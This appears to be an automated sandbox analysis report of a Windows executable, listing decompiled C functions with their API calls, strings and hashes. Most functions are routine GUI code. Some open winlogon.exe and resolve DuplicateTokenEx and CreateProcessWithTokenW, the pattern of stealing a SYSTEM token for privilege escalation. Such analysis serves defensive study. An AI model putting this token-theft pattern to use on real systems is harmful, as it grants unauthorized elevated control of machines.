                                                                                                                • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                                				struct HDWP__* _v8;
                                                                                                                				intOrPtr* _v12;
                                                                                                                				void _v534;
                                                                                                                				short _v536;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t42;
                                                                                                                				intOrPtr* _t95;
                                                                                                                				RECT* _t96;
                                                                                                                
                                                                                                                				_t95 = __ecx;
                                                                                                                				_v12 = __ecx;
                                                                                                                				if(_a4 == 0x233) {
                                                                                                                					_v536 = 0;
                                                                                                                					memset( &_v534, 0, 0x208);
                                                                                                                					DragQueryFileW(_a8, 0,  &_v536, 0x104);
                                                                                                                					DragFinish(_a8);
                                                                                                                					 *((intOrPtr*)( *_t95 + 4))(0);
                                                                                                                					E00404923(0x104, _t95 + 0x1680,  &_v536);
                                                                                                                					 *((intOrPtr*)( *_v12 + 4))(1);
                                                                                                                					_t95 = _v12;
                                                                                                                				}
                                                                                                                				if(_a4 != 5) {
                                                                                                                					if(_a4 != 0xf) {
                                                                                                                						if(_a4 == 0x24) {
                                                                                                                							_t42 = _a12;
                                                                                                                							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
                                                                                                                							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						E00402EC8(_t95 + 0x40);
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_v8 = BeginDeferWindowPos(0xd);
                                                                                                                					_t96 = _t95 + 0x40;
                                                                                                                					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
                                                                                                                					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
                                                                                                                					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
                                                                                                                					EndDeferWindowPos(_v8);
                                                                                                                					InvalidateRect( *(_t96 + 0x10), _t96, 1);
                                                                                                                					_t95 = _v12;
                                                                                                                				}
                                                                                                                				return E00402CED(_t95, _a4, _a8, _a12);
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040421E
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                                                                • DragFinish.SHELL32(?), ref: 0040423F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                  • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                  • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                • BeginDeferWindowPos.USER32 ref: 0040427D
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                                                                • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2142561256-3993045852
                                                                                                                • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                                                                • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                                                                • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 55%
                                                                                                                			E00405B81(signed short __ebx) {
                                                                                                                				signed int _t21;
                                                                                                                				void* _t22;
                                                                                                                				struct HINSTANCE__* _t25;
                                                                                                                				signed int _t27;
                                                                                                                				void* _t35;
                                                                                                                				signed short _t39;
                                                                                                                				signed int _t40;
                                                                                                                				void* _t57;
                                                                                                                				int _t61;
                                                                                                                				void* _t62;
                                                                                                                				int _t71;
                                                                                                                
                                                                                                                				_t39 = __ebx;
                                                                                                                				if( *0x41c470 == 0) {
                                                                                                                					E00405ADF();
                                                                                                                				}
                                                                                                                				_t40 =  *0x41c468;
                                                                                                                				_t21 = 0;
                                                                                                                				if(_t40 <= 0) {
                                                                                                                					L5:
                                                                                                                					_t57 = 0;
                                                                                                                				} else {
                                                                                                                					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
                                                                                                                						_t21 = _t21 + 1;
                                                                                                                						if(_t21 < _t40) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L5;
                                                                                                                						}
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                                                                				}
                                                                                                                				L6:
                                                                                                                				if(_t57 != 0) {
                                                                                                                					L21:
                                                                                                                					_t22 = _t57;
                                                                                                                				} else {
                                                                                                                					if((_t39 & 0x00010000) == 0) {
                                                                                                                						if( *0x40fb90 == 0) {
                                                                                                                							_push( *0x41c478 - 1);
                                                                                                                							_push( *0x41c45c);
                                                                                                                							_push(_t39);
                                                                                                                							_t25 = E00405CE7();
                                                                                                                							goto L15;
                                                                                                                						} else {
                                                                                                                							wcscpy(0x40fda0, L"strings");
                                                                                                                							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                                                                							_t62 = _t62 + 0x10;
                                                                                                                							if(_t35 == 0) {
                                                                                                                								L13:
                                                                                                                								_t25 = GetModuleHandleW(0);
                                                                                                                								_push( *0x41c478 - 1);
                                                                                                                								_push( *0x41c45c);
                                                                                                                								_push(_t39);
                                                                                                                								goto L15;
                                                                                                                							} else {
                                                                                                                								_t61 = wcslen( *0x41c45c);
                                                                                                                								if(_t61 == 0) {
                                                                                                                									goto L13;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t25 = GetModuleHandleW(_t57);
                                                                                                                						_push( *0x41c478 - 1);
                                                                                                                						_push( *0x41c45c);
                                                                                                                						_push(_t39 & 0x0000ffff);
                                                                                                                						L15:
                                                                                                                						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                                                                						_t71 = _t61;
                                                                                                                					}
                                                                                                                					if(_t71 <= 0) {
                                                                                                                						L20:
                                                                                                                						_t22 = 0x40c4e8;
                                                                                                                					} else {
                                                                                                                						_t27 =  *0x41c46c;
                                                                                                                						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                                                                							goto L20;
                                                                                                                						} else {
                                                                                                                							_t57 =  *0x41c458 + _t27 * 2;
                                                                                                                							_t14 = _t61 + 2; // 0x2
                                                                                                                							memcpy(_t57,  *0x41c45c, _t61 + _t14);
                                                                                                                							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                                                                							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                                                                							 *0x41c468 =  *0x41c468 + 1;
                                                                                                                							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                                                                							if(_t57 != 0) {
                                                                                                                								goto L21;
                                                                                                                							} else {
                                                                                                                								goto L20;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t22;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                • wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                                                                  • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                                                                • wcslen.MSVCRT ref: 00405C20
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                • memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                                                                  • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                • String ID: strings
                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                                                                • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                                                                • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                                                                				char _v8;
                                                                                                                				void* _v12;
                                                                                                                				void* __esi;
                                                                                                                				void* _t18;
                                                                                                                				intOrPtr* _t22;
                                                                                                                				void* _t23;
                                                                                                                				void* _t28;
                                                                                                                				int _t37;
                                                                                                                				intOrPtr* _t39;
                                                                                                                				intOrPtr* _t40;
                                                                                                                
                                                                                                                				_v8 = 0;
                                                                                                                				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                                                                				_v12 = _t18;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					_t37 = GetLastError();
                                                                                                                				} else {
                                                                                                                					_t39 = _a4 + 0x800;
                                                                                                                					_a8 = 0;
                                                                                                                					E0040289F(_t39);
                                                                                                                					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                                                                					if(_t22 == 0) {
                                                                                                                						_t23 = 0;
                                                                                                                					} else {
                                                                                                                						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                                                                					}
                                                                                                                					if(_t23 == 0) {
                                                                                                                						_t37 = GetLastError();
                                                                                                                					} else {
                                                                                                                						_a4 = _a8;
                                                                                                                						E0040289F(_t39);
                                                                                                                						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                                                                						if(_t40 == 0) {
                                                                                                                							_t28 = 0;
                                                                                                                						} else {
                                                                                                                							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                                                                						}
                                                                                                                						if(_t28 == 0) {
                                                                                                                							_t37 = GetLastError();
                                                                                                                						} else {
                                                                                                                							 *_a12 = _v8;
                                                                                                                							_t37 = 0;
                                                                                                                						}
                                                                                                                						CloseHandle(_a8);
                                                                                                                					}
                                                                                                                					CloseHandle(_v12);
                                                                                                                				}
                                                                                                                				return _t37;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                  • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                  • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                • String ID: winlogon.exe
                                                                                                                • API String ID: 1315556178-961692650
                                                                                                                • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00405236(short* __ebx, intOrPtr _a4) {
                                                                                                                				int _v8;
                                                                                                                				char _v12;
                                                                                                                				void _v2058;
                                                                                                                				void _v2060;
                                                                                                                				int _t35;
                                                                                                                				int _t41;
                                                                                                                				signed int _t48;
                                                                                                                				signed int _t49;
                                                                                                                				signed short* _t50;
                                                                                                                				void** _t52;
                                                                                                                				void* _t53;
                                                                                                                				void* _t54;
                                                                                                                
                                                                                                                				_t48 = 0;
                                                                                                                				_v2060 = 0;
                                                                                                                				memset( &_v2058, 0, 0x7fe);
                                                                                                                				_t54 = _t53 + 0xc;
                                                                                                                				 *__ebx = 0;
                                                                                                                				_t52 = _a4 + 4;
                                                                                                                				_v12 = 2;
                                                                                                                				do {
                                                                                                                					_push( *_t52);
                                                                                                                					_t6 = _t52 - 4; // 0xe80040cb
                                                                                                                					_push( *_t6);
                                                                                                                					_push(L"%s (%s)");
                                                                                                                					_push(0x400);
                                                                                                                					_push( &_v2060);
                                                                                                                					L0040B1EC();
                                                                                                                					_t35 = wcslen( &_v2060);
                                                                                                                					_v8 = _t35;
                                                                                                                					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                                                                					_t49 = _t48 + _v8 + 1;
                                                                                                                					_t41 = wcslen( *_t52);
                                                                                                                					_v8 = _t41;
                                                                                                                					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                                                                					_t54 = _t54 + 0x34;
                                                                                                                					_t52 =  &(_t52[2]);
                                                                                                                					_t23 =  &_v12;
                                                                                                                					 *_t23 = _v12 - 1;
                                                                                                                					_t48 = _t49 + _v8 + 1;
                                                                                                                				} while ( *_t23 != 0);
                                                                                                                				_t50 = __ebx + _t48 * 2;
                                                                                                                				 *_t50 =  *_t50 & 0x00000000;
                                                                                                                				_t50[1] = _t50[1] & 0x00000000;
                                                                                                                				return __ebx;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                • String ID: %s (%s)
                                                                                                                • API String ID: 3979103747-1363028141
                                                                                                                • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                                • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                                • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				void _v514;
                                                                                                                				short _v516;
                                                                                                                				void _v8710;
                                                                                                                				short _v8712;
                                                                                                                				int _t17;
                                                                                                                				WCHAR* _t26;
                                                                                                                
                                                                                                                				E0040B550(0x2204, __ecx);
                                                                                                                				_v8712 = 0;
                                                                                                                				memset( &_v8710, 0, 0x2000);
                                                                                                                				_t17 = GetDlgCtrlID(_a4);
                                                                                                                				_t34 = _t17;
                                                                                                                				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                                                                				if(_t17 > 0 && _v8712 != 0) {
                                                                                                                					_v516 = 0;
                                                                                                                					memset( &_v514, 0, 0x1fe);
                                                                                                                					GetClassNameW(_a4,  &_v516, 0xff);
                                                                                                                					_t26 =  &_v516;
                                                                                                                					_push(L"sysdatetimepick32");
                                                                                                                					_push(_t26);
                                                                                                                					L0040B278();
                                                                                                                					if(_t26 != 0) {
                                                                                                                						E00406025(_t34,  &_v8712);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                • String ID: sysdatetimepick32
                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 68%
                                                                                                                			E00404706(long __edi, wchar_t* _a4) {
                                                                                                                				short _v8;
                                                                                                                				void* _t8;
                                                                                                                				void* _t10;
                                                                                                                				long _t14;
                                                                                                                				long _t24;
                                                                                                                
                                                                                                                				_t24 = __edi;
                                                                                                                				_t8 = 0;
                                                                                                                				_t14 = 0x1100;
                                                                                                                				if(__edi - 0x834 <= 0x383) {
                                                                                                                					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
                                                                                                                					if(0 != 0) {
                                                                                                                						_t14 = 0x1900;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                                                					_t10 = wcscpy(_a4, 0x40c4e8);
                                                                                                                				} else {
                                                                                                                					if(wcslen(_v8) < 0x400) {
                                                                                                                						wcscpy(_a4, _v8);
                                                                                                                					}
                                                                                                                					_t10 = LocalFree(_v8);
                                                                                                                				}
                                                                                                                				return _t10;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                • wcslen.MSVCRT ref: 00404756
                                                                                                                • wcscpy.MSVCRT ref: 00404766
                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                • wcscpy.MSVCRT ref: 00404780
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                • String ID: netmsg.dll
                                                                                                                • API String ID: 2767993716-3706735626
                                                                                                                • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                				intOrPtr _v12;
                                                                                                                				void* _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				char _v32;
                                                                                                                				char _v72;
                                                                                                                				void _v582;
                                                                                                                				long _v584;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr _t27;
                                                                                                                				wchar_t* _t34;
                                                                                                                				wchar_t* _t42;
                                                                                                                				long* _t43;
                                                                                                                				int _t44;
                                                                                                                				void* _t52;
                                                                                                                				void* _t54;
                                                                                                                				long _t56;
                                                                                                                				long* _t57;
                                                                                                                				void* _t60;
                                                                                                                
                                                                                                                				_t60 = __eflags;
                                                                                                                				_t52 = __edx;
                                                                                                                				E004095AB( &_v72);
                                                                                                                				_v584 = 0;
                                                                                                                				memset( &_v582, 0, 0x1fe);
                                                                                                                				E004095FD(_t52, _t60,  &_v72);
                                                                                                                				_t27 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				if(_v20 <= 0) {
                                                                                                                					L10:
                                                                                                                					_t56 = 0;
                                                                                                                				} else {
                                                                                                                					do {
                                                                                                                						_t57 = E00405A92(_t27,  &_v32);
                                                                                                                						if(E00409A94( *_t57,  &_v584) == 0) {
                                                                                                                							goto L9;
                                                                                                                						} else {
                                                                                                                							_t34 =  &_v584;
                                                                                                                							_push(_t34);
                                                                                                                							_push(_a4);
                                                                                                                							L0040B278();
                                                                                                                							if(_t34 == 0) {
                                                                                                                								L5:
                                                                                                                								_t44 = 0;
                                                                                                                								_t54 = OpenProcess(0x2000000, 0,  *_t57);
                                                                                                                								if(_t54 == 0) {
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									_v16 = _v16 & 0;
                                                                                                                									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
                                                                                                                										_t44 = 1;
                                                                                                                										CloseHandle(_v16);
                                                                                                                									}
                                                                                                                									CloseHandle(_t54);
                                                                                                                									if(_t44 != 0) {
                                                                                                                										_t56 =  *_t57;
                                                                                                                									} else {
                                                                                                                										goto L9;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t42 = wcschr( &_v584, 0x5c);
                                                                                                                								if(_t42 == 0) {
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									_t43 =  &(_t42[0]);
                                                                                                                									_push(_t43);
                                                                                                                									_push(_a4);
                                                                                                                									L0040B278();
                                                                                                                									if(_t43 != 0) {
                                                                                                                										goto L9;
                                                                                                                									} else {
                                                                                                                										goto L5;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L12;
                                                                                                                						L9:
                                                                                                                						_t27 = _v12 + 1;
                                                                                                                						_v12 = _t27;
                                                                                                                					} while (_t27 < _v20);
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				L12:
                                                                                                                				E004095DA( &_v72);
                                                                                                                				return _t56;
                                                                                                                			}






















                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                  • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                  • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                  • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                  • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                  • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                  • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                  • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
